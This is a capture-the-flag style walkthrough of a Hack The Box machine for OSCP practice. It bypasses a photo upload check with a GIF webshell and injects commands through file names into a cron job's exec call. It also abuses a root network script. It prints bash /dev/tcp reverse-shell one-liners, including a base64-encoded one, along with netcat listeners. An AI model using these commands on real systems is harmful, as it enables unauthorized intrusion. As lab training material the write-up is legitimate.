Follow along on my OSCP journey: this is target 7 of TJNULL’s OSCP list.
How to use this walkthrough?
To avoid the typical answer-on-a-plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you hints along the way to help you when you struggle and keep the Try Harder mantra real.
Let’s go!
Enumeration
I use Tib3rius’ multi-threaded Autorecon, which combines several tools to enumerate and scan services. It creates a simple file structure and gives you a nice overview of the services scanned.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.146
Autorecon
While it runs, I usually look at the _quick_tcp_nmap.txt file while waiting for _full_tcp_nmap.txt to finish.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFgr+LYQ5zL9JWnZmjxP7FT1134sJla89HBT+qnqNvJQRHwO7IqPSa5tEWGZYtzQ2BehsEqb/PisrRHlTeatK0X8qrS3tuz+l1nOj3X/wdcgnFXBrhwpRB2spULt2YqRM49aEbm7bRf2pctxuvgeym/pwCghb6nSbdsaCIsoE+X7QwbG0j6ZfoNIJzQkTQY7O+n1tPP8mlwPOShZJP7+NWVf/kiHsgZqVx6xroCp/NYbQTvLWt6VF/V+iZ3tiT7E1JJxJqQ05wiqsnjnFaZPYP+ptTqorUKP4AenZnf9Wan7VrrzVNZGnFlczj/BsxXOYaRe4Q8VK4PwiDbcwliOBd
| 256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAsf1XXvL55L6U7NrCo3XSBTr+zCnnQ+GorAMgUugr3ihPkA+4Tw2LmpBr1syz7Z6PkNyQw6NzC3KwSUy1BOGw8=
| 256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILMrhnJBfdb0fWQsWVfynAxcQ8+SNlL38vl8VJaaqPTL
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp closed https reset ttl 63
There is really only one interesting port here, let’s focus on port 80.
Web server — port 80
We can see in gobuster a couple of interesting URLs
/backup (Status: 301) [Size: 235]
/index.php (Status: 200) [Size: 229]
/lib.php (Status: 200) [Size: 0]
/photos.php (Status: 200) [Size: 1302]
/upload.php (Status: 200) [Size: 169]
/uploads (Status: 301) [Size: 236]
Let us see what they hold
We have an upload section
A backup of the site
We downloaded the backup and extracted it: tar -xvf backup.tar
- lib.php is just a library of functions.
- photos.php shows the last 4 uploaded pictures.
- index.php returns the normal main page.
- upload.php is the main upload page.
- /uploads is where the pictures are stored.
The path is clear: we need to understand what the upload restrictions are and find a way to bypass them so we can upload a PHP webshell or reverse shell.
Can you create a webshell that bypasses those restrictions?
HINT
We can see that we need a valid MIME type, stay below 6000Kb, and the extension needs to be .jpg, .png, .gif or .jpeg. One of these extensions is just better…
.
.
.
.
Gif baby!
Let’s follow the tutorial and upload the webshell with the correct mime type.
We can see in photos.php that whatever we upload ends up named like this: “uploaded_by_<IP>.<extension>”.
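As an added example (not code from the original write-up or from the box), here is the class of upload check the hint describes, modelled in Python next to a stricter version that decides everything from the file content and builds the stored name itself. The TINY_GIF and POLYGLOT samples are constructed, and the function names and the underscore-separated IP in the stored name are my assumptions.

```python
MAX_BYTES = 6000 * 1024          # the "below 6000Kb" limit from the hint
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
MAGIC = {                         # leading bytes -> MIME type for the accepted formats
    b"GIF87a": "image/gif", b"GIF89a": "image/gif",
    b"\xff\xd8\xff": "image/jpeg",
    b"\x89PNG\r\n\x1a\n": "image/png",
}
MIME_EXT = {"image/gif": "gif", "image/jpeg": "jpg", "image/png": "png"}

# Constructed samples: a header-only GIF and a GIF-prefixed text polyglot
# (harmless marker text, not a payload).
TINY_GIF = b"GIF89a\x01\x00\x01\x00\x00\x00\x00;"
POLYGLOT = b"GIF89a<?php /* constructed marker */ ?>"

def sniff_mime(data: bytes):
    """MIME from magic bytes only, the way a finfo/mime_content_type style check works."""
    return next((m for magic, m in MAGIC.items() if data.startswith(magic)), None)

def weak_check(filename: str, data: bytes) -> bool:
    """The class of check the hint describes: an allowed extension at the end of
    the client's name, an image MIME type from magic bytes, and a size limit.
    GIF's magic is plain ASCII, so text that merely starts with 'GIF89a' passes."""
    ext_ok = any(filename.lower().endswith("." + e) for e in ALLOWED_EXT)
    return ext_ok and sniff_mime(data) is not None and len(data) <= MAX_BYTES

def strict_check(filename: str, data: bytes, client_ip: str):
    """Return the server-chosen storage name, or None when rejected. Every
    decision is made from the content; the client's name only has to agree
    with it and never reaches disk."""
    if len(data) > MAX_BYTES:
        return None
    mime = sniff_mime(data)
    if mime is None:
        return None
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if {"jpeg": "jpg"}.get(ext, ext) != MIME_EXT[mime]:   # type/extension mismatch
        return None
    if b"<?" in data:                 # cheap polyglot signal: images carry no PHP tags
        return None
    # Name pattern from the page (uploaded_by_<IP>.<extension>); the IP is written
    # with underscores (assumption) so the result has exactly one dot and one extension.
    return f"uploaded_by_{client_ip.replace('.', '_')}.{MIME_EXT[mime]}"
```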
Let’s look for our webshell in /uploads
Let’s capture the request and work directly inside Burp.
Let’s get a reverse shell now!
Don’t forget to start your listener!
nc -nlvp 4444
We are in!
Getting User
Time for some shell upgrade 😉
- python -c 'import pty; pty.spawn("/bin/bash")'
- Ctrl+Z
- stty raw -echo
- fg (nothing will show on the screen; just press Enter a couple of times after the command)
Let’s do some recon!
We find an odd cron job in Guly’s home directory
HINT
What is the only thing we actually have influence on in this code?
.
.
.
.
$value: we can create files inside $path (/var/www/html/uploads) and the code will loop through them! Each file name is then used in this beautiful line.
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
The simple idea is to create a file whose name carries the command we want to run, and then play it like a command injection bypass.
We try to name a file after a reverse shell command, but one constraint stops us: “/” isn’t allowed in filenames.
HINT
Can you find a beautiful way to create a reverse shell without using ‘/’? What is the beloved technique used by PowerShell to encode its commands?
.
.
.
.
Transform them to BASE64!
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.46/6666 0>&1"' | base64 -w0
Now we just need to create the file and wait ❤
Don’t forget the listener!!!
touch ";echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xOC83NzcgMD4mMSIK| base64 -d | bash"
We are Guly! Let’s own this server
Getting Root
The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.
Quick Wins
- sudo -l → sudo permissions
- ls -la /opt/ → looking for interesting executables or files
- ls -la /var/www/; ls -la /var/www/html → possible configuration files with a DB password or even a user password
- ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd, read on shadow)
The first one is a charm!
What does that file do?
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF
regexp="^[a-zA-Z0-9_\ /-]+$"
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
        echo "interface $var:"
        read x
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        done
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
/sbin/ifup guly0
It creates a file, then loops through 4 variables, asking the user to provide each value before appending it to the file, and finally brings the interface up with /sbin/ifup.
This was a bit of trial and error, trying to understand how we were supposed to exploit this. After trying for a while, I found that adding a space in our input would execute the second part of the variable.
We own this place!
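Both privilege escalation steps on this box come down to an untrusted string landing inside a shell command line: the cron job's exec() line with $value, and the root script's `echo $var=$x` line that ifup later sources. As an added example (not code from the write-up or the box), the block below models both with shlex instead of running anything, next to hardened replacements; the function names, the ";echo injected" sample file name and the stricter STRICT_RE pattern are my assumptions.

```python
import os
import re
import shlex

UPLOADS = "/var/www/html/uploads/"   # $path in the cron job shown above
ORIGINAL_RE = re.compile(r"^[a-zA-Z0-9_\ /-]+$")   # $regexp from the root script above
STRICT_RE = re.compile(r"^[a-zA-Z0-9_-]+$")        # proposed: no space, no slash

def shell_tokens(cmdline: str) -> list:
    """Tokenize like a POSIX shell, keeping ; | & < > ( ) as their own tokens."""
    return list(shlex.shlex(cmdline, posix=True, punctuation_chars=True))

def argument_intact(path: str, value: str) -> bool:
    """Model exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"): True only
    if the file name survives as the single fourth word and nothing extra appears.
    A benign name yields exactly 10 tokens; ';', '|' or a space in the name adds more."""
    try:
        tokens = shell_tokens(f"nohup /bin/rm -f {path}{value} > /dev/null 2>&1 &")
    except ValueError:                # unbalanced quote in the name: not a clean argument
        return False
    return tokens[3:4] == [path + value] and len(tokens) == 10

def safe_rm_argv(path: str, value: str) -> list:
    """Hardened replacement: an argv list, no shell, plain basenames only.
    Shell metacharacters in the name become inert bytes of one argument."""
    if value in ("", ".", "..") or os.path.basename(value) != value:
        raise ValueError(f"refusing path-like name {value!r}")
    return ["/bin/rm", "-f", os.path.join(path, value)]

def ifcfg_line_is_single_assignment(var: str, x: str) -> bool:
    """The script appends `echo $var=$x` to ifcfg-guly and ifup sources that file
    as shell code. More than one word means the remainder runs as a command."""
    try:
        return len(shell_tokens(f"{var}={x}")) == 1
    except ValueError:
        return False

def safe_ifcfg_line(var: str, x: str) -> str:
    """Validate with the stricter pattern, then quote anyway as defence in depth
    so the sourced line can only ever be an assignment."""
    if not STRICT_RE.match(x):
        raise ValueError(f"invalid value for {var}: {x!r}")
    return f"{var}={shlex.quote(x)}"
```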
What did I learn?
- We learned how to bypass upload restrictions with the gif extension
- We learned about embedding code into filenames for execution
- We learned how to spot interesting weaknesses in code and abuse them
Stream
Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.